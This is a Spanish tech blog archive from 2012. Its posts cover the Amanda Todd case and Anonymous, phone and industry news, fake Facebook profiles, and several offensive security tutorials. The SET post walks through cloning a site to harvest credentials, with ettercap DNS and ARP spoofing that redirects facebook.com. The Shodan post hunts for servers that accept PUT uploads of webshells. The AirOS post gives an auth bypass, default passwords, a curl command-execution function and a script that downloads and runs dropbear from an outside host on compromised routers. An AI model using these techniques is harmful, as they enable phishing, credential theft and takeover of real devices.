jueves, 18 de octubre de 2012

La venganza de Anonymous (caso Amanda Todd)


El grupo de hackers Anonymous pudo haber rastreado al ciberacosador obsesionado con el sexo que condujo a una joven de 15 años de edad a quitarse la vida la semana pasada. Ayer día 17, Anonymous publicó un vídeo en YouTube señalando a un hombre de 32 años de edad, de la Columbia Británica, como la persona responsable del suicidio de Amanda Todd el pasado 10 de octubre.
Anonymous ha comenzado #OpRIP para cazar a los que intimidaron a Amanda Todd.

Nos remontamos al pasado miércoles cuando Amanda Todd, de 15 años, fue encontrada muerta en su casa de Port Coquitlam, en Canadá. El mes pasado había difundido un vídeo-denuncia en blanco y negro, con los siguientes mensajes: «Mi historia: lucha, bullying, soledad, suicidio, autolesiones». 

La joven Amanda ya había denunciado que, cuando tenía 12 años, un acosador anónimo la había instado a desnudarse y mostrarse por la webcam, creyendo que hablaba con un amigo de su edad.

Este polémico caso de acoso de una adolescente que terminó en suicidio conmovió a medio mundo y el grupo FawkesSecurity, asociado a Anonymous, quiso tomar cartas en el asunto y difundir la identidad el presunto acosador de Amanda.        


"Este es el pedófilo que, a través de ingeniería social, a herido a Amanda Todd,
y como mínimo es otro pedófilo que abusa de niños",  dijo Anonymous en un post en Pastebin antes de la identificación de un hombre que vive 30 años en New Westminster, BC.
  
El video subido por Anonymous ha sido retirado por youtube : http://www.youtube.com/watch?v=pYk19SD4FCs.

El nombre y los apellidos de este usuario asiduo a webs de pornografía infantil aparecen en un vídeo publicado por esta red de ciberactivistas, hecho por el cual la policía canadiense ha reforzado la seguridad del presunto acosador, «que teme por su vida», según su abogado Eric Gottardi.


No obstante, la familia de Amanda llama a la calma ya que podría tratarse de la persona equivocada, después de que los investigadores encontrasen pistas del presunto acosador en una dirección IP estadounidense..

¿Y si Anonymous no estuviera en lo cierto?


Contrastando noticias es posible que Anonymous este apuntando al tipo equivocado como dice en un comunicado la RCMP, que tenga algunos datos equivocados como la edad del presunto agresor que en realidad es de 19 años
que el agresor de Amanda Todd no sea este tipo, como dicen las ultimas líneas de investigación. 

Esto me pone los pelos de punta... en cuestión de horas después de el comunicado de Anonymous, en Internet vitorearon la acción sin preguntarse por la veracidad de la noticia. La dirección e identidad del sospechoso corrió como la pólvora, los medios de comunicación hicieron visitas al supuesto domicilio del sospechoso y la Real Policía Montada envió dos coches patrulla a la casa. 

Cosa que no estaría mal (lo de la policía digo) si el sospechoso viviese allí... porque resultó ser el domicilio equivocado... ¿Y si algún loco hubiese llegado antes que la policía? ¿o la masa enfurecida convencida de que hay vive el agresor?. Es posible que el sospechoso que identificó Anonymous se conectara desde la wifi de el vecino al cual le dieron seguro un susto de tres pares....

A las pocas horas Anonymous comunicó por Facebook "Por favor, dejar de publicar la dirección del hombre en Westminster. No es la persona correcta. La persona que hizo esto ya está en custodia. Tenemos que tener cuidado cuando se está difundiendo información. ¡Gracias!"

Tras dar con el sospechoso apuntado por Anonymous , la policía identificó a este sujeto que, a pesar de no estar claro del todo su implicación en el caso, si es cierto que tuvo contacto con Amanda y que parece no ser trigo limpio: acusado de asalto sexual a una persona menor de 16 años y nominado "Blackmailer of the Year" en los premios online Capper Awards, que galardona a los hombres que intimidan a las menores para que se desnuden frente a las cámaras. 
  
En este caso, en mi opinión,este supuesto sospechoso  ha recibido un 5% de lo que se merece, pues si bien parece que no ha tenido nada que ver con el suicidio de Amanda, si ha agredido sexualmente a una menor, ha intentado chantajear a vete tú a saber cuantas y consume pornografía pedófila, etc.

En algunos medios, se le ha tratado como una víctima del loco afán de venganza y notoriedad del grupo Anonymous...con lo cual y desde mi modestia no estoy de acuerdo. No olvidemos a que dedica su tiempo libre el angelico... También es cierto que en vez de soltar ese bombazo en Youtube deberían haberlo pensado un poco y hablar primero con la policía.

No obstante, e
n esta historia la que de verdad perdió fue Amanda Todd, víctima del ciber acoso y del bullying, de lo cual podemos sacar una conclusión: como todo, la extraordinaria comunicación que nos aporta la Red de redes... puede tener dos filos ...y hay que saber donde pone uno los dedos....

Como último apunte, el Parlamento canadiense inició esta semana el debate de una moción para enfrentar el acoso escolar y cibernético. El diputado socialdemócrata Dany Morin, de 26 años, lanzó la iniciativa y dijo que la situación se ha convertido en "un problema nacional", magnificado por Internet. Según la organización Bullying Canada, que se dedica a combatir el acoso escolar en el país, uno de cada siete niños canadiense de entre 11 y 16 años es víctima del bullying.


Fuentes:  

miércoles, 17 de octubre de 2012

Introducción a Social-Engineering Toolkit (SET)

En el mundo de la seguridad informática no se puede dejar nunca de lado la ingeniería social.

La ingeniería social continúa siendo una de las metodologías de ataque más utilizadas debido al alto nivel de eficacia logrado engañando al usuario.

Como dijo aquel "la cadena es tan fuerte como el eslabón mas débil que la componga" y, en más ocasiones de las que debiera, este eslabón no tiene nombre de hardware o software, si no de algún fulano llamado Pepe, Manuel o José Luis...
Aunque no es nuevo y muchos de vosotros lo conoceréis, vamos a gastar unos minutos en hablar de SET (Social-Engineering Toolkit).
  
Que es SET?
 
Simplificando al máximo:

SET es una completísima suite dedicada a la ingeniería social , que nos permite automatizar tareas que van desde el de envío de SMS (mensajes de texto) falsos, con los que podemos suplantar el numero telefónico que envía el mensaje, a clonar cualquier pagina web y poner en marcha un servidor para hacer phishing en cuestión de segundos.

 
El kit de herramientas SET está especialmente diseñado para realizar ataques avanzados contra el elemento humano. Originalmente, este instrumento fue diseñado para ser publicado con el lanzamiento de http://www.social-engineer.org y rápidamente se ha convertido en una herramienta estándar en el arsenal de los pentesters. SET fue escrito por David Kennedy (ReL1K) con un montón de ayuda de la comunidad en la incorporación de los ataques nunca antes vistos en un juego de herramientas de explotación.

SET integra muchas de las funciones de Metasploit, es más, muchas de las funciones de SET las saca de Metasploit, por tanto no se concibe SET sin previamente tener instalado Metasploit.

Quizás lo que mas nos ha llamado la atención de SET es su eficacia y agilidad a la hora de implementar su gran variedad de ataques...
 
Bueno dejando de un lado la cháchara vamos a echar un vistazo rápido a SET y algunas de sus funciones. No podemos olvidar que tratarlo a fondo nos podría llevar mas de un post y por otra parte, no os podemos privar del placer de investigar sobre esta magnífica herramienta de ReL1k y su equipo... 
 
Iniciando Social-Engineering Toolkit (SET)
SET es multiplataforma y sólo necesitamos tener instalado el interprete de Python para ejecutarlo e iniciarlo con ./set o Python set en la carpeta donde decidamos guardarlo.

SET viene integrado en BACKTRACK pero lo podéis descargar directamente desde la pagina trustedsec, si queréis usar cualquier otra distribución .

https://www.trustedsec.com/downloads/social-engineer-toolkit/ 

por medio de svn:

svn co http://svn.trustedsec.com/social_engineering_toolkit set/ 

El cerebro
SET es su archivo de configuración (sec-config que esta en la carpeta config). Configurado por defecto funciona perfectamente para la mayoría de la gente, sin embargo, la personalización avanzada puede ser necesaria a fin de garantizar el éxito de algún ataque específico. Lo primero que debe hacer es asegurarse de que ha actualizado SET, en el directorio donde este instalado mediante el comando ./set-update

Una vez actualizado a la ultima versión nos aseguraremos de que está bien configurado mirando bien en todas sus banderas y dándole la información necesaria como por ejemplo la ubicación de Metasploit, ettercap etc.etc...necesarias para su correcto funcionamiento.


 root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap 


 
 
Al iniciar el SET, lo primero que vemos es  una presentación al estilo de Metasploit, con los nombres de su creador y equipo de desarrollo, número de versión (en nuestro caso es la 4.1.1, a día de hoy la ultima lanzada por el desarrollador), todo esto seguido por un conciso y más que orientativo menú.
  
Bueno en el caso que nos ocupa hoy vamos a entrar en la primera opción que nos brinda el susodicho menú:

1) Social-Engeneering Attacks que no quiere decir otra cosa que ataques de ingeniería social.
Nos dará como resultado un segundo menú que en la linea del primero es bastante explicito a la par que conciso.

En este segundo menú empezamos a ver la "chicha" y el carácter serio que va tomando este magnifico suite de trustedsec...

 
Entre otras cosas SET nospermite:

 1) El menú de ataque de phishing se utiliza para llevar a cabo ataques de correo electrónico dirigidos contra una víctima.

2) The Social-Engineer Toolkit "Attack Web" vector es una forma única de utilizar múltiples ataques basados ​​en Web con el fin de comprometer a la posible víctima. 

3) Infectious Media Generator nos permite crear medios infectados por medio de los payload de metasploit que utilizan autorun.inf file.

4) Create a Payload and Listener simplifica enormemte la creación de ficheros .exe apartir de los payloads de Metasploit y sus clientes.
 
5) Mass Mailer Attack  nos permitirá el ataque masivo mandando correos electrónicos a múltiples víctimas y personalizar los mensajes.

Las siguientes hablan por si solas y, como hemos dicho antes, es casi imposible ver SET en profundidad en un solo post -o al menos sin hacerse uno mas pesao que una vaca en brazos- por lo que no me voy a extender demasiado y nos vamos a centrar, en algo sencillo y vistoso no sin recomendar que profundiceis en todas y cada unas de las opciones, ya que no tienen desperdicio alguno.


2) website Attack Vector 

Dentro de esta opción tenemos otra llamada 3) Credential Harvester Attack Method por medio de la conseguiremos clonar exactamente un sitio web y subiremos un servidor en nuestra máquina, listo para engañar a algún incauto,y conseguir su cuenta de correo y contraseña.  Creo que no me equivoco si digo que todo el mundo hemos hecho ésto alguna vez ,pero desde luego no con tan poquísimo esfuerzo e inversión de tiempo como ahora.

Llegados aquí pulsaríamos sobre la opción 2)Site cloner y rellenaremos los campos que nos vaya pidiendo,como podemos ver en el screenshot anterior. Tras unos segundos tendremos perfectamente clonado el site y el servidor arriba listo para la maldad en http://localhost.
Lo siguiente seria hacer un DNS-spoofing lo podriamos hacer directamente en SET pero para que quede mas claro lo haremos con ettercap ..
root@bt:~# nano /usr/local/share/ettercap/etter.dns

microsoft.com      A                                                              198.182.196.56                                                                   
*.microsoft.com    A   198.182.196.56                                            
www.microsoft.com  PTR 198.182.196.56      # Wildcards in PTR are not             allowed##########################################                                
# no one out there can have our domains...                                       
              
#                                                                 
www.alor.org  A 127.0.0.1                                                        
www.naga.org  A 127.0.0.1                                                        
www.facebook.es A 127.0.0.1                                                      
www.facebook.com A 127.0.0.1                                                     
Guardamos y arrancamos ettercap.

root@bt:~# ettercap -Tq -i wlan0 -P dns_spoof -M arp // //        

Con esto ya tendríamos lista nuestra trampa de elefantes, tan solo nos queda esperar y.......¡bingo!, tras unos minutos queda registrado su password y dirección ;)

Como hemos comprobado SET es muy ágil y preciso a la vez que impecable a la hora de llevar acabo nuestras recomendaciones. Pero ésto es tan sólo la puntita del iceberg. Os dejo un par de vídeos para que podáis ver verdadero potencial de esta herramienta...

Social Engineering Toolkit - Java Web Attack

 
                        
Social Engineering toolkit tutorial- hack windows 
 




Fuente:

¿Dónde meto mi webshell? Métodos inseguros con Shodan

Esta tarde a las 16:00 comienza el Curso Online de Auditoría y Seguridad Web, y ayer estuvimos discutiendo un poco sobre él. Preparando una de las clases que van sobre Hacking con Buscadores, estuvimos mirando algunas demos que hacer con Shodan, este simpático buscador que te permite encontrar casi de todo y que nosotros siempre utilizamos en nuestras auditorias de aplicaciones web.
En este caso, la gracia era buscar aquellas respuestas en servidores HTTP que ya directamente, sin necesidad de hacer un escaneo de OPTIONS, informan de que soportan el método PUT, para poder subir una webshell.
 
Figura 1: Método PUT permitido en Allow
Que el servidor web devuelva que soporta el método PUT no quiere decir que luego esté implementado y que los permisos que tenga en el sistema de ficheros sean los necesarios para poder escribir los ficheros, pero viendo la gran cantidad de sitos donde se aparecen con un programa que pruebe en todos ellos las probabilidades de desplegar webshells por Internet de forma masiva son altas. Pero si lo que se busca es una vulnerabilidad, puede que con un DELETE sea más que suficiente para tirar abajo una aplicación web.
 
Figura 2: Servicio con método DELETE permitido 
Otra de las cosas que también es posible encontrar, es no solo los métodos en Allow, sino también los permitidos en Access-Control-Allow-Methods, que aunque son políticas para peticiones AJAX Cross-Domain, es más que probable que, si tiene el método PUT permitido para ellas, es más que probable que también lo tenga como método HTTP.
 
Figura 3: PUT y DELETE en Access-Control-Allow-Methods
Puestos a buscar por métodos en inseguros en Shodan, es posible encontrar todos ellos, pasando por DELETE, COPY, y los utilizados en servidores documentales como SharePoint para solicitar bloqueo de ficheros o acceso a propiedades. 
 
Figura 4: Servidor documental con Access-Control-Allow-Methods para casi todo

Actualmente, los métodos inseguros en FOCA los buscamos con un escaneo de OPTIONS, que es un poco más inteso en cómputo, pero más exhaustivo, pero si está bloqueado el método Options en el firewall, mirar las cabeceras Allow y Access-Control-Allow-Methods puede dar aún información útil.
 
 

Asus renueva su apuesta por el smartphone convertible en tablet con el Padfone 2

Mantiene la filosofía de equipo híbrido o convertible vista en su predecesor, pero con un cuerpo más fino y ligero en el que pierde protagonismo el teclado. Asus ha desvelado hoy en Taiwán un Padfone 2 que hace gala de especificaciones mejoradas y que empezará a verse en países como España antes de que acabe el año.
Como sucedía con el primer Padfone y su estación, Asus edifica la filosofía del equipo sobre un smartphone que puede funcionar como tal por sí solo y aumentar sus posibilidades al ser insertado en un tablet. El teléfono sigue estando basado en Android 4.0, pero cuenta ahora con una pantalla IPS de 4,7 pulgadas y 720 x 1280 píxeles de resolución, un chip Qualcomm Snapdragon S4 y 2 GB de RAM.



Si bien el peso y el grosor del smartphone se mantienen casi inalterables (135 gramos y 9 milímetros), cuando éste se inserta en su estación para convertirse en el "cerebro" de un tablet con pantalla de 10,1 pulgadas el conjunto es sensiblemente más ligero. Concretamente, un Padfone 2 ya montado pesa 649 gramos, unos 200 gramos menos que el peso combinado del teléfono y la estación de la versión anterior.

Otro punto en el que Asus afirma haber mejorado la fórmula está en la autonomía. El smartphone integra una batería de 2.140 mAh que, según el fabricante, le permite navegar mediante Wi-Fi durante 13 horas o mantener 16 horas de conversación telefónica por 3G antes de requerir una recarga. Al entrar en acción la batería de 5.000 mAh, esta última marca ascendería a nada menos que 36 horas. En esta ocasión, eso sí, Asus no tiene de momento planes para completar la fórmula con un teclado externo.


El smartphone que configura la pieza central del Padfone 2 también ha mejorado en aspectos como la conectividad (incluyendo estándares como las conexiones LTE y NFC) o la cámara, de 13 megapíxeles y con una apertura de f2.4. Este captor puede además grabar vídeo a 1080p y con 30 fotogramas por segundo o a 720p y con 60 fotos por segundo, incluso mientras realiza ráfagas de imágenes fijas en la máxima resolución.

Estará disponible en versiones con 16, 32 y 64 GB de almacenamiento (integrados en el teléfono) y llegará antes de que acabe el año a diversos mercados asiáticos y europeos, España incluida. En dicho país, ya están confirmadas las versiones de 32 y 64 GB con respectivos precios de 800 y 900 euros, incluyendo en ambos casos el smartphone y la estación.


Más información acerca de esta noticia:

Información publicada por Asus

FUENTE

Test muestra que el Galaxy SIII entrega más horas navegando en Internet



Mientras siguen creciendo el tamaño de las pantallas y el poder de procesamiento de los celulares modernos, también crece el gasto energético de las baterías. Esos antiguos e indestructibles teléfonos como el Nokia 3310 –que daban la impresión que podrían durar días sin necesitar una recarga– hace mucho que ya no están en el mercado.

Un estudio de “Which?“ comparó a 99 teléfonos modernos, midiendo la cantidad de minutos que duraban sus baterías mientras navegaban por páginas web. Para tener la señal 3G estable, el sitio inglés contaba con su propia antena para que la potencia de ésta no varíe con el tiempo.

Finalmente, y pese al tamaño de su pantalla, el teléfono que más le duró su batería terminó siendo el Samsung Galaxy S III con 359 minutos, unas seis horas. En el otro extremo, el teléfono al que menos le duró la batería fue el HTC Sensation XL con 139 minutos.

Mientras que respecto al iPhone, el estudio mostró la particularidad de que dura más la batería del 4S que del iPhone 5, pese a que este último tiene una batería más grande. Eso si, ambos mucho más abajo que su principal competidor, el Samsung Galaxy S III.


Fuente

martes, 16 de octubre de 2012

AMD RamDisk ¿Cómo convertir tu memoria RAM en un disco duro ultra-rápido

AMD acaba de anunciar oficialmente RAMDisk. Esta aplicación, junto con las Apus Trinity mejora de forma notable el rendimiento de cualquier equipo de sobremesa. Lo bueno de RAMDisk es que también se puede utilizar en plataformas Intel.

¿Para que sirve RamDisk? Esta aplicación te permite crear un pequeño disco duro en tu memoria RAM con las ventajas que esto conlleva.




No pasarás del rendimiento de un Disco duro convencional al de un SSD, los archivos que se encuentren en este nuevo disco duro gozarán de un rendimiento excepcional, estamos hablando de unas tasas de transferencia de hasta 51,2 Gbytes/s en memorias DDR3 a 1600Mhz (con Quad-chanell claro).

El mayor problema es que según del tamaño de RAM del que dispongas gozarás o no de cierta ventaja. En sistemas con menos de 8Gbytes de ram no se recomienda usarlo pero con 8GB podrás crear una pequeña partición de 4Gbytes en la que podrás almacenar cache de tu sistema o instalar aplicaciones que volarán.

He podido hacer una prueba en mi equipo de “pequeñas prestaciones” (un i3 con 8GB de DDR3 a 1600Mhz) y alcanza una velocidad de lectura de 5,2 GBytes/s de lectura frente a los 130 MBytes/s de un disco duro normal. En un par de días realizaré la misma prueba en mi i7 (socket 2011) con Quad-chanell y lo compararé con un SSD OCZ Agility-3 para comprobar la velocidad, será bestial la diferencia entre ambos.



 
¿Te imaginas crear un disco duro de 20 GB, si gozas de 32GB de ram, e instalar en el Premiere (o la cache del programa), aplicaciones que exigen alto rendimiento o utilizarlo como cache del sistema? Verás como a la hora de trabajar las tasas de trasferencia y el procesado de archivos mejorará de forma bestial.

El software está destinado al mundo gamer, donde un juego instalado en estas unidades gozaría de tiempos de carga ridículos. Si quieres empezar a probarlo, puedes DESCARGAR AMD RAMDISK.


FUENTE

lunes, 15 de octubre de 2012

Microsoft busca a 3.400 ingenieros para su nómina

El hecho evidencia un grave problema en la formación de jóvenes en el tema tecnológico. Los puestos de trabajo vacantes abiertos para ingenieros y matemáticos en la empresa Microsoft crecieron en el último año 34 por ciento y se estima que seguirán aumentando en todo el país, si no hay reformas profundas en la formación de profesores y alumnos de secundaria en los Estados Unidos.

Las cifras fueron reveladas por el propio vicepresidente de Investigación de la compañía, Peter Lee, al analizar las deficiencias que presenta la Ley de la Competitividad, del 2007, que se propuso -entre otras cosas- fortalecer la enseñanza de las ciencias, tecnologías, ingenierías y matemáticas, a fin de superar el atraso que registra Estados Unidos frente a otros países industrializados.


En un debate en el senado, el senador John Rockefeller señaló que la ley se incumplió y se falló en el compromiso de doblar los recursos de investigación para la innovación y la formación de talentos para el desarrollo de tecnologías avanzadas.

Dijo que un ejemplo claro de la efectividad de dichos recursos fue la donación de cuatro y medio millones de dólares que en 1994 a Larry Page y Sergei Brin, creadores de Google, un emporio que maneja hoy 200.000 millones de dólares y da empleo a 50 mil profesionales.

Lee dijo que la dificultad para conseguir personal calificado que enfrenta Microsoft, que cerró el pasado mes de julio sin poder llenar 3.400 plazas de trabajo, no es solo para la industria de la informática, sino también para otros sectores innovadores como el de la energía, la salud y las manufacturas.

Estimó que, solo para analizar los datos que están arrojando los supercomputadores, se necesitarán por lo menos un millón y medio de gerentes capaces de interpretar esa información casi infinita.

Indicó que Microsoft tiene abiertos 56 campos de investigación, que requieren profesionales en todas las disciplinas, pues programas que empiezan como un simple juego para niños, posteriormente puede convertirse en una aplicación para la medicina o la industria aeroespacial.

Por su parte, el premio Nobel de Física Carl Wieman, vinculado a la Universidad de Colorado, dijo que la raíz del problema está en la pobre formación de los profesores de ciencias y matemáticas en secundaria, y sus anticuados métodos de enseñanza.

Con clases aburridas y repetitivas, simplemente no tienen como despertar el interés de los estudiantes y no es porque no tengan talento, pues todo ser humano lo tiene, sino porque no se le ofrecen las herramientas e incentivos para desarrollarlo. No es cierto eso de los talentos innatos, añadió.

CAMBIAR EL MÉTODO E INCENTIVAR A LOS ESTUDIANTES

La enseñanza actual es anticreativa, el escaso conocimiento que tienen los profesores sobre las distintas materias le impiden enseñar y evaluar las capacidades de los alumnos.

Con lo anterior conspira el sistema de exámenes estandarizados, que aporta muy poco, afirmó Wieman. De otro lado, el director de la Iniciativa Nacional para las Ciencias y las Matemáticas, John Winn, de Texas, dijo que el remedio de fondo está en la formación de una nueva generación de profesores, capacitados para enseñar a profundidad dichas materias.

“Para el efecto, la entidad tiene un programa de cuatro años de universidad, ETeach, exclusivo para docentes, que no solo saben la materia, sino que saben enseñarla para despertar el interés necesario en sus alumnos. Ya son 5.500 los estudiantes, y se aspira a llegar a 4 millones en el 2020”, explicó.

PORTAFOLIO

Halo 4 se filtra en las redes P2P

La ISO completa ya está en las redes P2P. 16Gb la version de 2 dicos y 8334Mb la de uno solo.

http://www.youtube.com/watch?v=ihFbx...&feature=g-u-u



 
Edit: compren el juego, en serio

Steve Wozniak critica a Apple por la pantalla del iPhone 5





Steve Wozniak vuelve a demostrar que no tiene pelos en la lengua a la hora de lanzar declaraciones. El ingeniero y co-fundador de Apple en la década de los años 70 —1976 para ser exactos— junto al desaparecido Steve Jobs, ha declarado que Apple se está convirtiendo en una empresa arrogante. Y está demostrando que ella es la única que tiene razón.

Wozniak, que con cada lanzamiento de Apple sale en los medios opinando sobre los nuevos inventos de Cupertino, ha sido crítico con el último smartphone de la compañía: el iPhone 5. Este modelo, que ha crecido en pantalla hasta las cuatro pulgadas en diagonal, no es lo suficientemente grande para el co-fundador , según ha declarado en una reciente entrevista concedida al portal TalkCentral.

Al ingeniero —y ex-Apple— le hubiese gustado un móvil de tamaño mayor, aunque no ha indicado cuál sería la medida exacta a la que hacía refrencia. Lo que sí ha comentado en la entrevista es que hubiese preferido tener, a su disposición, un iPhone pequeño y otro grande. Además, también ha hecho referencia al mercado actual de móvil con Android, donde la mayoría de terminales tienen diagonales de mucha mayor envergadura que el nuevo iPhone 5. Y lo más curioso, según Wozniak, es que los usuarios no tienen problemas con ellas.

La arrogancia se ha hecho un hueco dentro de Apple, según palabras del co-fundador. Y es que ellos (Apple) piensan que son los únicos con la verdad absoluta; lo más importante es que el usuario puede hacer funcionar el terminal con una sola mano y es la única excusa que tiene para defenderse de la competencia, sentenciaba el polifacético y mediático ingeniero.

Por último, Steve se pone en la piel de los consumidores y ofrece una última declaración: “Not all people want the same thing. A lot of people really like big screens.” O lo que es lo mismo: “No todo el mundo quiere lo mismo; a un gran grupo de gente les gusta las pantallas grandes“. Una de las posibles razones de que las ventas del Samsung Galaxy S3 sean tan buenas a día de hoy.

Otra de las afirmaciones que hacía Wozniak era que, aunque el iPhone 5 tenga más resolución que otros famosos smartphones del mercado, la sensación que tiene el usuario al ver la oferta, es que en otros equipos tendrán más espacio para contenido; aspecto muy interesante para clientes que estén conectados a la Red en modo intensivo. Ningún miembro de ha salido en escena para rebatir las palabras del co-fundador.

Si los rumores son ciertos, Apple tiene intención de lanzar al mercado un nuevo dispositivo: el iPad mini. Una versión más comedida de la famosa tablet; con un precio inferior —entre los 250 y 350 dólares—; y se espera que únicamente tenga conexión WiFi, para abaratar costes de producción. Por otro lado, su pantalla se encogería hasta las 7,85 pulgadas, adoptaría el nuevo estándar de conexión Lightning y también podría equipar una cámara de fotos. Un equipo con el que, seguramente, Wozniak también aparezca en escena para comentar sus impresiones.



 FUENTE

domingo, 14 de octubre de 2012

FakeBook: Encuentra scammers en Facebook con Google Images

Hace tiempo que abrí mi perfil de Facebook al público. No tengo nada en privado y le doy un uso totalmente público. Es por eso que hace tiempo que dejé de aceptar solicitudes de amistad - y es probable que reduzca los amigos allí -, ya que puedes enviarme mensajes o suscribirte a lo que publico pongo en abierto.
Sin embargo, sigo recibiendo peticiones de amistad, y algunas de esas son de las que te hacen pensar dos veces eso de no aceptar a nadie, porque la foto promete largas e interesantes horas de debate sobre seguridad informática, arte y política. Ya sabes que tengo especial debilidad por las leopardesas...
Figura 1: Esta "chica" me pide amistad
El caso es que, como yo ya he sido ajado por la vida muchas veces, me he topado con perfiles falsos de en Facebook, y sé que, con lo difícil que es ligar con mis técnicas, es complicado además que me coma una rosca por Facebook o correo electrónico, así que alguna vez me daba por revisar las fotos con TinEye.
Esta vez lo hice utilizando el buscado de Google Images, usando la imagen. La idea es tan sencilla como pasarle la URL de la imagen o hacer drag and drop del fichero desde tu equipo y seleccionar la opción de Buscar por Imagen.
Figura 2: Buscar por imagen con la URL de la imagen del perfil
Por supuesto, el resultado fue un dolor en el corazón... un nuevo fiasco, otra desilusión, ya que como podéis ver, este mujer se llama de muchas formas distintas en diferentes redes de contactos, algo como nuestro querido depredador alemán que cayó en la JavaScript Botnet.
Figura 3: Esta foto tiene más perfiles que yo
Debido a eso, decidí pedir a Facebook que abra una investigación sobre esta cuenta, porque me da a mí que no me equivoco mucho si digo que esta cuenta esconde a un scammer de tomo y lomo que anda buscando incrédulos que piquen.
Figura 4: Reportando la cuenta a Facebook como scammer
Ten cuidado no caigas en una de estas cuentas de "FakeBook" y acabes metido en un lío pagando papeles de la aduana para... bueno... ya sabes cómo van las estafas del nigeriano.




viernes, 12 de octubre de 2012

Explotación, postexplotación y potencial del 0day en AirOS

En Diciembre del 2011, sd de fucksheep.org liberó un 0day que afectaba a los sistemas AirOS (http://seclists.org/fulldisclosure/2011/Dec/419) el cual fue parcheado aunque, como suele ser costumbre, no todos los sistemas han sido actualizados.

No quiero entrar en debate de si los responsables son los usuarios, o el desarrollador, simplemente expongo el tema.


Todo esto y algo más, fue reportado a Ubiquiti, los cuales al principio agradecieron la aportación, pero en el segundo contacto pasaron del tema y ni siquiera contestaron. Consideramos que ha pasado el suficiente tiempo como para publicar la información.


Todas las pruebas han sido realizadas en dispositivos propios, en ningún momento en ajenos. Este aporte es meramente informativo, y no me responsabilizo del mal uso que se le pueda dar a esta información.
 

Me gustaria agradecer por su inestimable trabajo a PunkiD y MARCOSCARS02.

Voy a comenzar con algunos conceptos básicos necesarios para entender el reporte:

¿Qué es un AirOS y que 0day es este?


AirOS es un sistema operativo avanzado, creado por Ubiquiti, capaz de manejar un sistema Wireless, enrutamiento y mínimas características ips y seguridad. Un sistema operativo para routers que busca la sencillez y la facilidad, siendo muy intuitivo, mas información en: http://www.ubnt.com/.

Hablemos un poco del hardware. Las CPU's de los sistemas AirOS son procesadores mips (Microprocessor without Interlocked Pipeline Stages). Es una arquitectura que consume muy pocos recursos y tiene una funcionalidad aceptable. Al ser de arquitectura distinta a la de los PC's convencionales (generalmente de 32 o 64 bits), si queremos compilar algo para mips, necesitamos recurrir a la crosscompilación, es decir, compilar un programa/servicio para una arquitectura distinta a la máquina en la que estamos trabajando. Tras muchas pruebas, recurrimos a Buildroot, una utilidad de uclib que permite desde compilar el toolchain hasta herramientas típicas y básicas, una imagen de sistema, etc.


El 0day afectaba al archivo admin.cgi, el cual es capaz de mostrar el panel “Device Administration Utility” que contiene:

  •     Un Uploader.
  •     Un Chmod.
  •     Un Downloader.
  •     Una Shell.
Imágen del panel login:



Imágen del panel de administración:



Explotación

El usuario y la contraseña por defecto de los AirOS son:
    Usuario: ubnt
    Contraseña: ubnt
 

Se recomienda usar Shodan para la búsqueda de dispositivos AirOS, pero este tipo de búsquedas dejan escapar muchos dispositivos. Actualmente trabajamos en un scanner por rangos de IP para localizar todos.

Se puede observar que el error consiste en cambiar la url de una petición de login al cgi; /login.cgi/uri=/ por /admin.cgi/$vuln .
Siendo $vuln cualquiera de los sientes: *.ico *.gif, *.jpg, *.js, *.css, airview.jar.pack.gz, airview_manager.jnlp, airview.jnlp, airview.uavr.
Por ejemplo: http://IPairos/admin.cgi/lol.css
De esta forma conseguimos el panel de administración, para muchos el fin, pero esto es solo el principio.

Postexplotación

El sistema operativo que lleva montado, por defecto solo tiene permisos de lectura en la mayoría de los directorios del dispositivo. Pero en /etc hay permisos de escritura, así pues tenemos un /etc/persistent/ a modo de home en el dispositivo. Lo primero es tener consola root en el dispositivo, para poder tener el control total. A través del panel subimos y ejecutamos dropbear mas su respectiva key crosscompilados.

De esta forma ya hemos conseguido ssh. A partir de aquí, vuestra imaginación es lo importante, para ver el potencial de estos dispositivos.
Tras tener funcionales todos los binarios, tenemos un “miniserver” externo:




Tenemos un pequeño directorio con un puñado de binarios ya crosscompilados y listos para AirOS disponible en:

    http://5.175.223.63/bin/


Y empaquetado en .tar:


    http://5.175.223.63/bin.tar

Incluso podríamos incluir algunos más como ngircd (Un pequeño servidor IRC), o lo que se nos ocurra.

A continuación, vamos a pasar a automatizar estas tareas. Obviamente no puedo publicar más que un par de lineas para deja la imaginación flotar con bash y curl:

runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }

Aplicaciones


Algunas de las cosas que se pueden hacer con estos dispositivos son:


  •     Encadenar AirOS a modo de proxys (SSH Tunneling).
  •     Shells de IRC.
  •     Bots.
  •     Servidor IRC.
  •     Servidor Web/ftp/etc
  •     Y muchas otras que podais imaginar.
Automatización del proceso

Pasemos a automatizar todo el proceso anterior. Para ello utilizaremos el airosh de la siguiente manera:

./airosh IPairos

El script se ejecutará y automáticamente comprobará si el dispositivo es vulnerable. Si es así, procederá a subir Dropbear, y a cambiar las claves de acceso, con contraseña:lol. De esta forma, habremos conseguido el acceso al dispositivo como administrador.



CODIGO: http://5.175.223.63/airosh


#!/bin/bash

host=$1
portlocal=$2
hostfinal=$3
portfinal=$4
unset c
usage() {
        # ./airosh IP
        exit 1
}
[[ -z "$host" ]] && c=1
[[ -z "$portlocal" ]] && c=2
[[ -z "$hostfinal" ]] && c=2
[[ -z "$portfinal" ]] && c=2

if [[ $c = 1 ]]; then
        echo "FAILED!"
        usage
else
        echo "OK"
fi
runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }

runcmd 'cd /var/persistent;wget -q http://5.175.223.63/dropbearkey;wget -q http://5.175.223.63/dropbear;chmod +x dropbearkey dropbear;'  >>/tmp/airos.log

